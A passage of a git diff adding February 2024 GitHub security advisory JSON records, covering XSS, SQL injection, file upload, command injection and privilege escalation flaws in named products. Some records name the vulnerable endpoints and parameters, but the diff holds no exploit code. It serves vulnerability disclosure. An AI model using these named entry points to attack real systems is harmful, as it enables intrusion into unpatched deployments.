false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2qrq-mpmg-w3v6/GHSA-2qrq-mpmg-w3v6.json b/advisories/unreviewed/2024/02/GHSA-2qrq-mpmg-w3v6/GHSA-2qrq-mpmg-w3v6.json new file mode 100644 index 0000000000000..78967a2753df3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2qrq-mpmg-w3v6/GHSA-2qrq-mpmg-w3v6.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2qrq-mpmg-w3v6", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-24494" + ], + "details": "Cross Site Scripting vulnerability in Daily Habit Tracker v.1.0 allows a remote attacker to execute arbitrary code via the day, exercise, pray, read_book, vitamins, laundry, alcohol and meat parameters in the add-tracker.php and update-tracker.php components.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24494" + }, + { + "type": "WEB", + "url": "https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/DailyHabitTracker-Stored_XSS.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2rrv-22x6-4f23/GHSA-2rrv-22x6-4f23.json b/advisories/unreviewed/2024/02/GHSA-2rrv-22x6-4f23/GHSA-2rrv-22x6-4f23.json new file mode 100644 index 0000000000000..cd9bbceeda620 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2rrv-22x6-4f23/GHSA-2rrv-22x6-4f23.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2rrv-22x6-4f23", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T00:31:28Z", + "aliases": [ + "CVE-2024-22016" + ], + "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an authorized user can write directly to the Scada directory. This may allow privilege escalation.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22016" + }, + { + "type": "WEB", + "url": "https://rapidscada.org/contact/" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T00:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2rwq-3mr3-vq32/GHSA-2rwq-3mr3-vq32.json b/advisories/unreviewed/2024/02/GHSA-2rwq-3mr3-vq32/GHSA-2rwq-3mr3-vq32.json new file mode 100644 index 0000000000000..a23d6451af3bb --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2rwq-3mr3-vq32/GHSA-2rwq-3mr3-vq32.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2rwq-3mr3-vq32", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20009" + ], + "details": "In alac decoder, there is a possible out of bounds write due to an incorrect error handling. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS08441150; Issue ID: ALPS08441150.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20009" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2vc7-qfwp-f3cw/GHSA-2vc7-qfwp-f3cw.json b/advisories/unreviewed/2024/02/GHSA-2vc7-qfwp-f3cw/GHSA-2vc7-qfwp-f3cw.json new file mode 100644 index 0000000000000..b301df137e500 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2vc7-qfwp-f3cw/GHSA-2vc7-qfwp-f3cw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2vc7-qfwp-f3cw", + "modified": "2024-02-06T06:30:32Z", + "published": "2024-02-06T06:30:32Z", + "aliases": [ + "CVE-2023-43523" + ], + "details": "Transient DOS while processing 11AZ RTT management action frame received through OTA.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43523" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2wff-jj2f-98c4/GHSA-2wff-jj2f-98c4.json b/advisories/unreviewed/2024/02/GHSA-2wff-jj2f-98c4/GHSA-2wff-jj2f-98c4.json new file mode 100644 index 0000000000000..90bc2a14d41d5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2wff-jj2f-98c4/GHSA-2wff-jj2f-98c4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2wff-jj2f-98c4", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-02-05T21:30:31Z", + "aliases": [ + "CVE-2024-0202" + ], + "details": "A security vulnerability has been identified in the cryptlib cryptographic library when cryptlib is compiled with the support for RSA key exchange ciphersuites in TLS (by setting the USE_RSA_SUITES define), it will be vulnerable to the timing variant of the Bleichenbacher attack. An attacker that is able to perform a large number of connections to the server will be able to decrypt RSA ciphertexts or forge signatures using server's certificate.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0202" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256518" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-208" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T21:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2wmp-6cvh-326h/GHSA-2wmp-6cvh-326h.json b/advisories/unreviewed/2024/02/GHSA-2wmp-6cvh-326h/GHSA-2wmp-6cvh-326h.json new file mode 100644 index 0000000000000..96fdeb6097b9a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2wmp-6cvh-326h/GHSA-2wmp-6cvh-326h.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2wmp-6cvh-326h", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2024-22899" + ], + "details": "Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the syncNtpTime function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22899" + }, + { + "type": "WEB", + "url": "https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2024/Jan/29" + }, + { + "type": "WEB", + "url": "http://vinchin.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2xhq-4fmf-r8g2/GHSA-2xhq-4fmf-r8g2.json b/advisories/unreviewed/2024/02/GHSA-2xhq-4fmf-r8g2/GHSA-2xhq-4fmf-r8g2.json new file mode 100644 index 0000000000000..be779f18c66e2 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2xhq-4fmf-r8g2/GHSA-2xhq-4fmf-r8g2.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2xhq-4fmf-r8g2", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-1262" + ], + "details": "A vulnerability, which was classified as critical, has been found in Juanpao JPShop up to 1.5.02. This issue affects the function actionUpdate of the file /api/controllers/merchant/design/MaterialController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-253001 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1262" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/C1btykKlahBD" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.253001" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.253001" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3298-46rv-mjjj/GHSA-3298-46rv-mjjj.json b/advisories/unreviewed/2024/02/GHSA-3298-46rv-mjjj/GHSA-3298-46rv-mjjj.json new file mode 100644 index 0000000000000..496dce5020c9e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3298-46rv-mjjj/GHSA-3298-46rv-mjjj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3298-46rv-mjjj", + "modified": "2024-02-06T03:32:59Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51509" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Metagauss RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login allows Reflected XSS.This issue affects RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login: from n/a through 5.2.4.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51509" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/custom-registration-form-builder-with-submission-manager/wordpress-registrationmagic-plugin-5-2-4-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T12:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-32c5-v2g2-22x7/GHSA-32c5-v2g2-22x7.json b/advisories/unreviewed/2024/02/GHSA-32c5-v2g2-22x7/GHSA-32c5-v2g2-22x7.json new file mode 100644 index 0000000000000..efc30612f7dda --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-32c5-v2g2-22x7/GHSA-32c5-v2g2-22x7.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-32c5-v2g2-22x7", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-23764" + ], + "details": "Certain WithSecure products allow Local Privilege Escalation. This affects WithSecure Client Security 15 and later, WithSecure Server Security 15 and later, WithSecure Email and Server Security 15 and later, and WithSecure Elements Endpoint Protection 17 and later.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23764" + }, + { + "type": "WEB", + "url": "https://www.withsecure.com/en/support/security-advisories" + }, + { + "type": "WEB", + "url": "https://www.withsecure.com/en/support/security-advisories/cve-2024-23764" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-32qr-r9g8-9jgp/GHSA-32qr-r9g8-9jgp.json b/advisories/unreviewed/2024/02/GHSA-32qr-r9g8-9jgp/GHSA-32qr-r9g8-9jgp.json new file mode 100644 index 0000000000000..73e2fb51d463b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-32qr-r9g8-9jgp/GHSA-32qr-r9g8-9jgp.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-32qr-r9g8-9jgp", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-32333" + ], + "details": "IBM Maximo Asset Management 7.6.1.3 could allow a remote attacker to log into the admin panel due to improper access controls. IBM X-Force ID: 255073.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32333" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/255073" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7112388" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-32vr-pw5g-2xc5/GHSA-32vr-pw5g-2xc5.json b/advisories/unreviewed/2024/02/GHSA-32vr-pw5g-2xc5/GHSA-32vr-pw5g-2xc5.json new file mode 100644 index 0000000000000..4e2b64c705893 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-32vr-pw5g-2xc5/GHSA-32vr-pw5g-2xc5.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-32vr-pw5g-2xc5", + "modified": "2024-02-05T06:30:29Z", + "published": "2024-02-05T06:30:29Z", + "aliases": [ + "CVE-2023-47170" + ], + "details": "Rejected reason: This candidate was in a CNA pool that was not assigned to any issues during 2023.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47170" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T05:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-338x-q4qx-prw7/GHSA-338x-q4qx-prw7.json b/advisories/unreviewed/2024/02/GHSA-338x-q4qx-prw7/GHSA-338x-q4qx-prw7.json new file mode 100644 index 0000000000000..6b28c539fdf3a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-338x-q4qx-prw7/GHSA-338x-q4qx-prw7.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-338x-q4qx-prw7", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-24018" + ], + "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass in crafted offset, limit, and sort parameters to perform SQL injection via /system/dataPerm/list", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24018" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24018.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T01:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-33cc-g737-2r5g/GHSA-33cc-g737-2r5g.json b/advisories/unreviewed/2024/02/GHSA-33cc-g737-2r5g/GHSA-33cc-g737-2r5g.json new file mode 100644 index 0000000000000..8089b85a7bdb9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-33cc-g737-2r5g/GHSA-33cc-g737-2r5g.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33cc-g737-2r5g", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2024-1253" + ], + "details": "A vulnerability, which was classified as critical, has been found in Beijing Baichuo Smart S40 Management Platform up to 20240126. Affected by this issue is some unknown functionality of the file /useratte/web.php of the component Import Handler. The manipulation of the argument file_upload leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252992. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1253" + }, + { + "type": "WEB", + "url": "https://github.com/b51s77/cve/blob/main/upload.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252992" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252992" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-33fg-vcj3-g326/GHSA-33fg-vcj3-g326.json b/advisories/unreviewed/2024/02/GHSA-33fg-vcj3-g326/GHSA-33fg-vcj3-g326.json new file mode 100644 index 0000000000000..6eb037c656c82 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-33fg-vcj3-g326/GHSA-33fg-vcj3-g326.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33fg-vcj3-g326", + "modified": "2024-02-06T06:30:30Z", + "published": "2024-02-06T06:30:30Z", + "aliases": [ + "CVE-2023-33049" + ], + "details": "Transient DOS in Multi-Mode Call Processor due to UE failure because of heap leakage.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33049" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-33hj-8g8g-96xr/GHSA-33hj-8g8g-96xr.json b/advisories/unreviewed/2024/02/GHSA-33hj-8g8g-96xr/GHSA-33hj-8g8g-96xr.json new file mode 100644 index 0000000000000..860c0d58255e0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-33hj-8g8g-96xr/GHSA-33hj-8g8g-96xr.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33hj-8g8g-96xr", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0660" + ], + "details": "The Formidable Forms – Contact Form, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.7.2. This is due to missing or incorrect nonce validation on the update_settings function. This makes it possible for unauthenticated attackers to change form settings and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0660" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3026901/formidable/tags/6.8/classes/controllers/FrmFormsController.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-34rx-mprw-whv5/GHSA-34rx-mprw-whv5.json b/advisories/unreviewed/2024/02/GHSA-34rx-mprw-whv5/GHSA-34rx-mprw-whv5.json new file mode 100644 index 0000000000000..308b50b06f2fb --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-34rx-mprw-whv5/GHSA-34rx-mprw-whv5.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34rx-mprw-whv5", + "modified": "2024-02-05T18:31:37Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-23054" + ], + "details": "An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution due to a package listed in ++plone++static/components not existing in the public package index (npm).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23054" + }, + { + "type": "WEB", + "url": "https://github.com/c0d3x27/CVEs/blob/main/CVE-2024-23054/README.md" + }, + { + "type": "WEB", + "url": "http://plone.com" + }, + { + "type": "WEB", + "url": "http://ploneorg.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-34vw-rxxh-698f/GHSA-34vw-rxxh-698f.json b/advisories/unreviewed/2024/02/GHSA-34vw-rxxh-698f/GHSA-34vw-rxxh-698f.json new file mode 100644 index 0000000000000..5045b610010f8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-34vw-rxxh-698f/GHSA-34vw-rxxh-698f.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34vw-rxxh-698f", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-02-08T18:30:39Z", + "aliases": [ + "CVE-2024-24321" + ], + "details": "An issue in Dlink DIR-816A2 v.1.10CNB05 allows a remote attacker to execute arbitrary code via the wizardstep4_ssid_2 parameter in the sub_42DA54 function.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24321" + }, + { + "type": "WEB", + "url": "https://github.com/dkjiayu/Vul/blob/main/DIR816A2-dir_setWanWifi.md" + }, + { + "type": "WEB", + "url": "https://www.dlink.com/" + }, + { + "type": "WEB", + "url": "https://www.dlink.com/en/security-bulletin/" + }, + { + "type": "WEB", + "url": "http://dir-816a2.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-35fv-vgfw-h8mj/GHSA-35fv-vgfw-h8mj.json b/advisories/unreviewed/2024/02/GHSA-35fv-vgfw-h8mj/GHSA-35fv-vgfw-h8mj.json new file mode 100644 index 0000000000000..75adef4942a7c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-35fv-vgfw-h8mj/GHSA-35fv-vgfw-h8mj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-35fv-vgfw-h8mj", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2024-1078" + ], + "details": "The Quiz Maker plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ays_quick_start() and add_question_rows() functions in all versions up to, and including, 6.5.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary quizzes.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1078" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3032035/quiz-maker/tags/6.5.2.5/admin/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ba2b270-5f02-4cd8-8a22-1723c3873d67?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T08:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-365x-5gg7-66qg/GHSA-365x-5gg7-66qg.json b/advisories/unreviewed/2024/02/GHSA-365x-5gg7-66qg/GHSA-365x-5gg7-66qg.json new file mode 100644 index 0000000000000..fd1a2a7bb5a93 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-365x-5gg7-66qg/GHSA-365x-5gg7-66qg.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-365x-5gg7-66qg", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-1254" + ], + "details": "A vulnerability, which was classified as critical, was found in Beijing Baichuo Smart S20 Management Platform up to 20231120. This affects an unknown part of the file /sysmanage/sysmanageajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252993 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1254" + }, + { + "type": "WEB", + "url": "https://github.com/rockersiyuan/CVE/blob/main/Smart%20S20.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252993" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252993" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T19:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-36w5-pmj5-pph2/GHSA-36w5-pmj5-pph2.json b/advisories/unreviewed/2024/02/GHSA-36w5-pmj5-pph2/GHSA-36w5-pmj5-pph2.json new file mode 100644 index 0000000000000..5cc7ddf820be7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-36w5-pmj5-pph2/GHSA-36w5-pmj5-pph2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-36w5-pmj5-pph2", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-47562" + ], + "details": "An OS command injection vulnerability has been reported to affect Photo Station. If exploited, the vulnerability could allow authenticated users to execute commands via a network.\n\nWe have already fixed the vulnerability in the following version:\nPhoto Station 6.4.2 ( 2023/12/15 ) and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47562" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-08" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:52Z" + } +} \ No newline at end of file diff --git 